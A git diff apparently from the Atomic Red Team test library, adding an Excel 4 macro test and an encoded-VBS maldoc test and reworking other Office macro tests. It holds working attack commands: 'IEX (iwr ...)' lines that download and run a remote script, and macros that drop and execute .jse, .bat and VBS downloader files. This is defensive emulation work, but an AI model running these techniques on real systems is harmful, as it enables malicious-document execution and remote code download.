diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 3126ec14..7ae3b587 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -633,6 +633,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
+execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -661,6 +662,7 @@ execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a rem
execution,T1059.004,Unix Shell,1,Create and Execute Bash Shell Script,7e7ac3ed-f795-4fa5-b711-09d6fbe9b873,sh
execution,T1059.004,Unix Shell,2,Command-Line Interface,d0c88567-803d-4dca-99b4-7ce65e7b257c,sh
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
+execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index def25897..241e57a5 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -439,6 +439,7 @@ execution,T1204.002,Malicious File,2,OSTap Payload Download,3f3af983-118a-4fa1-8
execution,T1204.002,Malicious File,3,Maldoc choice flags command execution,0330a5d2-a45a-4272-a9ee-e364411c4b18,powershell
execution,T1204.002,Malicious File,4,OSTAP JS version,add560ef-20d6-4011-a937-2c340f930911,powershell
execution,T1204.002,Malicious File,5,Office launching .bat file from AppData,9215ea92-1ded-41b7-9cd6-79f9a78397aa,powershell
+execution,T1204.002,Malicious File,6,Excel 4 Macro,4ea1fc97-8a46-4b4e-ba48-af43d2a98052,powershell
execution,T1106,Native API,1,Execution through API - CreateProcess,99be2089-c52d-4a4a-b5c3-261ee42c8b62,command_prompt
execution,T1059.001,PowerShell,1,Mimikatz,f3132740-55bc-48c4-bcc0-758a459cd027,command_prompt
execution,T1059.001,PowerShell,2,Run BloodHound from local disk,a21bb23e-e677-4ee7-af90-6931b57b6350,powershell
@@ -465,6 +466,7 @@ execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c
execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt
execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt
execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell
+execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell
execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell
execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt
execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index e328af02..51fb922f 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1090,6 +1090,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
+ - Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -1133,6 +1134,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
+ - Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index fd9c685a..526d1b20 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -836,6 +836,7 @@
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
+ - Atomic Test #6: Excel 4 Macro [windows]
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
@@ -875,6 +876,7 @@
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- [T1059.005 Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
+ - Atomic Test #2: Encoded VBS code execution [windows]
- [T1059.003 Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index b9f9becc..883f0a0c 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -40405,7 +40405,7 @@ discovery:
- linux
- macos
executor:
- command: 'username=$(echo $HOME | awk -F''/'' ''{print $3}'') && lsof -u $username
+ command: 'username=$(id -u -n) && lsof -u $username
'
name: sh
@@ -44322,35 +44322,30 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- $ms_office_version = #{ms_office_version}
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
+ cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
+
+'
name: powershell
- name: OSTap Payload Download
auto_generated_guid: 3f3af983-118a-4fa1-85d3-ba4daa739d80
@@ -44388,34 +44383,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- $ms_office_version = #{ms_office_version}
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: OSTAP JS version
auto_generated_guid: add560ef-20d6-4011-a937-2c340f930911
@@ -44433,35 +44421,27 @@ execution:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: String
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
- cleanup_command: |
- $ms_office_version = #{ms_office_version}
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
name: powershell
- name: Office launching .bat file from AppData
auto_generated_guid: 9215ea92-1ded-41b7-9cd6-79f9a78397aa
@@ -44473,41 +44453,126 @@ execution:
bat_path:
description: Path to malicious .bat file
type: String
- default: $env:temp+"\art1204.bat"
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office".
- Default latest version.
- type: string
- default: ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office
- -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_})
- | Sort-Object -desc)[0]
+ default: $("$env:temp\art1204.bat")
ms_product:
description: Maldoc application Word or Excel
type: String
default: Word
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependant registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
prereq_command: |
- $ms_office_version = #{ms_office_version}
- If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
+
+'
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
- $ms_office_version = #{ms_office_version}
- $bat_path = #{bat_path}
- $macrocode = " Open `"$bat_path`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
- Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+ $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n"
+ Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product}
+ name: powershell
+ - name: Excel 4 Macro
+ auto_generated_guid: 4ea1fc97-8a46-4b4e-ba48-af43d2a98052
+ description: |
+ This module creates an Excel 4 Macro (XLM) enabled spreadsheet and executes it. The XLM will first write a "malicious"
+ VBS file to %TEMP%, then execute this file. The VBS will download Process Explorer to the same directory (%TEMP%) and exec.
+
+ A note regarding this module. By default, this module will pull the current username from the system and places it into the macro. If
+ you'd like to utilize the "=GET.WORKSPACE(26)" method, that many maldoc authors use, you will need to ensure that the User Name associated
+ with Excel matches that of the local system. This username can be found under Files -> Options -> Username
+ supported_platforms:
+ - windows
+ input_arguments:
+ download_url:
+ description: Download URL
+ type: String
+ default: https://live.sysinternals.com/procexp.exe
+ uname:
+ description: Username for pathing
+ type: String
+ default: "$env:Username"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'Microsoft Excel must be installed
+
+'
+ prereq_command: |
+ try {
+ New-Object -COMObject "Excel.Application" | Out-Null
+ Stop-Process -Name "Excel"
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Excel
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ $fname = "$env:TEMP\atomic_redteam_x4m_exec.vbs"
+ $fname1 = "$env:TEMP\procexp.exe"
+ if (Test-Path $fname) {
+ Remove-Item $fname
+ Remove-Item $fname1
+ }
+
+ $xlApp = New-Object -COMObject "Excel.Application"
+ $xlApp.Visible = $True
+ $xlApp.DisplayAlerts = $False
+ $xlBook = $xlApp.Workbooks.Add()
+ $sheet = $xlBook.Excel4MacroSheets.Add()
+
+ if ("#{uname}" -ne "") {
+ $sheet.Cells.Item(1,1) = "#{uname}"
+ } else {
+ $sheet.Cells.Item(1,1) = "=GET.WORKSPACE(26)"
+ }
+
+ $sheet.Cells.Item(2,1) = "procexp.exe"
+ $sheet.Cells.Item(3,1) = "atomic_redteam_x4m_exec.vbs"
+ $sheet.Cells.Item(4,1) = "=IF(ISNUMBER(SEARCH(`"64`",GET.WORKSPACE(1))), GOTO(A5),)"
+ $sheet.Cells.Item(5,1) = "=FOPEN(`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`", 3)"
+ $sheet.Cells.Item(6,1) = "=FWRITELN(A5, `"url = `"`"#{download_url}`"`"`")"
+ $sheet.Cells.Item(7,1) = "=FWRITELN(A5, `"`")"
+ $sheet.Cells.Item(8,1) = "=FWRITELN(A5, `"Set winHttp = CreateObject(`"`"WinHTTP.WinHTTPrequest.5.1`"`")`")"
+ $sheet.Cells.Item(9,1) = "=FWRITELN(A5, `"winHttp.Open `"`"GET`"`", url, False`")"
+ $sheet.Cells.Item(10,1) = "=FWRITELN(A5, `"winHttp.Send`")"
+ $sheet.Cells.Item(11,1) = "=FWRITELN(A5, `"If winHttp.Status = 200 Then`")"
+ $sheet.Cells.Item(12,1) = "=FWRITELN(A5, `"Set oStream = CreateObject(`"`"ADODB.Stream`"`")`")"
+ $sheet.Cells.Item(13,1) = "=FWRITELN(A5, `"oStream.Open`")"
+ $sheet.Cells.Item(14,1) = "=FWRITELN(A5, `"oStream.Type = 1`")"
+ $sheet.Cells.Item(15,1) = "=FWRITELN(A5, `"oStream.Write winHttp.responseBody`")"
+ $sheet.Cells.Item(16,1) = "=FWRITELN(A5, `"oStream.SaveToFile `"`"C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`"`", 2`")"
+ $sheet.Cells.Item(17,1) = "=FWRITELN(A5, `"oStream.Close`")"
+ $sheet.Cells.Item(18,1) = "=FWRITELN(A5, `"End If`")"
+ $sheet.Cells.Item(19,1) = "=FCLOSE(A5)"
+ $sheet.Cells.Item(20,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A3&`"`")"
+ $sheet.Cells.Item(21,1) = "=WAIT(NOW()+`"00:00:05`")"
+ $sheet.Cells.Item(22,1) = "=EXEC(`"explorer.exe C:\Users\`"&A1&`"\AppData\Local\Temp\`"&A2&`"`")"
+ $sheet.Cells.Item(23,1) = "=HALT()"
+ $sheet.Cells.Item(1,1).Name = "runme"
+ $xlApp.Run("runme")
+ $xlApp.Quit()
+
+ [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlBook) | Out-Null
+ [System.Runtime.Interopservices.Marshal]::ReleaseComObject($xlApp) | Out-Null
+ [System.GC]::Collect()
+ [System.GC]::WaitForPendingFinalizers()
+
+ Remove-Variable xlBook
+ Remove-Variable xlApp
cleanup_command: |
- $ms_office_version = #{ms_office_version}
- if (Test-Path (#{bat_path})) { Remove-Item (#{bat_path}) }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Stop-Process -Name "procexp*" -ErrorAction Ignore
+ Remove-Item "$env:TEMP\atomic_redteam_x4m_exec.vbs" -ErrorAction Ignore
+ Remove-Item "$env:TEMP\procexp.exe" -ErrorAction Ignore
name: powershell
T1204.001:
technique:
@@ -46107,11 +46172,46 @@ execution:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
- command: 'cscript #{vbscript} > $env:TEMP\out.txt'
+ command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
+ - name: Encoded VBS code execution
+ auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
+ description: |
+ This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
+ a message box will pop up displaying "ART T1059.005"
+
+ A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
+ You can validate this by opening WinWord -> File -> Account -> About Word
+ supported_platforms:
+ - windows
+ dependency_executor_name: powershell
+ dependencies:
+ - description: 'The 64-bit version of Microsoft Office must be installed
+
+'
+ prereq_command: |
+ try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft Word (64-bit)
+ manually to meet this requirement"
+
+'
+ executor:
+ command: |
+ IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+ Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
+ cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine
+ -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+
+'
+ name: powershell
T1059.003:
technique:
created: '2020-03-09T14:12:31.196Z'
@@ -55331,31 +55431,30 @@ initial-access:
description: Maldoc application Word or Excel
type: String
default: Word
- ms_office_version:
- description: Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office"
- type: String
- default: '16.0'
dependency_executor_name: powershell
dependencies:
- - description: 'Test Requires MS Office to be installed and have been run previously.
- Run -GetPrereqs to run msword and build dependent registry keys
+ - description: 'Microsoft #{ms_product} must be installed
'
- prereq_command: 'If (Test-Path HKCU:SOFTWARE\Microsoft\Office\#{ms_office_version})
- { exit 0 } else { exit 1 }
+ prereq_command: |
+ try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+ } catch { exit 1 }
+ get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product}
+ manually to meet this requirement"
'
- get_prereq_command: |
- $msword = New-Object -ComObject word.application
- Stop-Process -Name WINWORD
executor:
command: |
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n"
- Invoke-MalDoc $macrocode "#{ms_office_version}" "#{ms_product}"
- cleanup_command: |
- if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
- Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\#{ms_office_version}\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+ Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
+ cleanup_command: 'Remove-Item #{jse_path} -ErrorAction Ignore
+
+'
name: powershell
T1566.002:
technique:
diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md
index 65026823..eae563f3 100644
--- a/atomics/T1059.005/T1059.005.md
+++ b/atomics/T1059.005/T1059.005.md
@@ -10,6 +10,8 @@ Adversaries may use VB payloads to execute malicious commands. Common malicious
- [Atomic Test #1 - Visual Basic script execution to gather local computer information](#atomic-test-1---visual-basic-script-execution-to-gather-local-computer-information)
+- [Atomic Test #2 - Encoded VBS code execution](#atomic-test-2---encoded-vbs-code-execution)
+
@@ -33,7 +35,7 @@ When successful, system information will be written to $env:TEMP\T1059.005.out.t
```powershell
-cscript #{vbscript} > $env:TEMP\out.txt
+cscript #{vbscript} > $env:TEMP\T1059.005.out.txt
```
#### Cleanup Commands:
@@ -60,4 +62,54 @@ Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
+
+
+
+## Atomic Test #2 - Encoded VBS code execution
+This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
+a message box will pop up displaying "ART T1059.005"
+
+A note regarding this module, due to the way that this module utilizes "ScriptControl" a 64bit version of Microsoft Office is required.
+You can validate this by opening WinWord -> File -> Account -> About Word
+
+**Supported Platforms:** Windows
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
+Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec"
+```
+
+#### Cleanup Commands:
+```powershell
+Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: The 64-bit version of Microsoft Office must be installed
+##### Check Prereq Commands:
+```powershell
+try {
+ $wdApp = New-Object -COMObject "Word.Application"
+ $path = $wdApp.Path
+ Stop-Process -Name "winword"
+ if ($path.contains("(x86)")) { exit 1 } else { exit 0 }
+} catch { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+```
+
+
+
+
diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml
index bdff9ad0..d4a38b2b 100644
--- a/atomics/T1059.005/T1059.005.yaml
+++ b/atomics/T1059.005/T1059.005.yaml
@@ -23,13 +23,13 @@ atomic_tests:
New-Item -ItemType Directory (Split-Path #{vbscript}) -Force | Out-Null
Copy-Item $env:TEMP\sys_info.vbs #{vbscript} -Force
executor:
- command: 'cscript #{vbscript} > $env:TEMP\out.txt'
+ command: 'cscript #{vbscript} > $env:TEMP\T1059.005.out.txt'
cleanup_command: |-
Remove-Item $env:TEMP\sys_info.vbs -ErrorAction Ignore
Remove-Item $env:TEMP\T1059.005.out.txt -ErrorAction Ignore
name: powershell
- name: Encoded VBS code execution
- auto_generated_guid:
+ auto_generated_guid: e8209d5f-e42d-45e6-9c2f-633ac4f1eefa
description: |
This module takes an encoded VBS script and executes it from within a malicious document. By default, upon successful execution
a message box will pop up displaying "ART T1059.005"
diff --git a/atomics/T1204.002/T1204.002.md b/atomics/T1204.002/T1204.002.md
index 69c4670c..245c1eae 100644
--- a/atomics/T1204.002/T1204.002.md
+++ b/atomics/T1204.002/T1204.002.md
@@ -18,6 +18,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
- [Atomic Test #5 - Office launching .bat file from AppData](#atomic-test-5---office-launching-bat-file-from-appdata)
+- [Atomic Test #6 - Excel 4 Macro](#atomic-test-6---excel-4-macro)
+
@@ -38,7 +40,6 @@ References:
|------|-------------|------|---------------|
| jse_path | Path for the macro to write out the "malicious" .jse file | String | C:\Users\Public\art.jse|
| ms_product | Maldoc application Word or Excel | String | Word|
-| ms_office_version | Microsoft Office version number found in "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office". Default latest version. | String | ((Get-ChildItem Registry::HKEY_CURRENT_USER\Software\Microsoft\Office -Name | select-string -pattern "^\d+\.\d+$").line.foreach({[decimal]$_}) | Sort-Object -desc)[0]|
#### Attack Commands: Run with `powershell`!
@@ -46,31 +47,31 @@ References:
```powershell
IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1")
-$ms_office_version = #{ms_office_version}
$macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n"
-Invoke-MalDoc $macrocode "$ms_office_version" "#{ms_product}"
+Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}"
```
#### Cleanup Commands:
```powershell
-if (Test-Path #{jse_path}) { Remove-Item #{jse_path} }
-$ms_office_version = #{ms_office_version}
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Office\$ms_office_version\#{ms_product}\Security\' -Name 'AccessVBOM' -ErrorAction Ignore
+Remove-Item #{jse_path} -ErrorAction Ignore
```
#### Dependencies: Run with `powershell`!
-##### Description: Test Requires MS Office to be installed and have been run previously. Run -GetPrereqs to run msword and build dependant registry keys
+##### Description: Microsoft #{ms_product} must be installed
##### Check Prereq Commands:
```powershell
-$ms_office_version = #{ms_office_version}
-If (Test-Path HKCU:SOFTWARE\Microsoft\Office\$ms_office_version) { exit 0 } else { exit 1 }
+try {
+ New-Object -COMObject "#{ms_product}.Application" | Out-Null
+ $process = "#{ms_product}"; if ( $process -eq "Word") {$process = "winword"}
+ Stop-Process -Name $process
+ exit 0
+} catch { exit 1 }
```
##### Get Prereq Commands:
```powershell
-$msword = New-Object -ComObject word.application
-Stop-Process -Name WINWORD
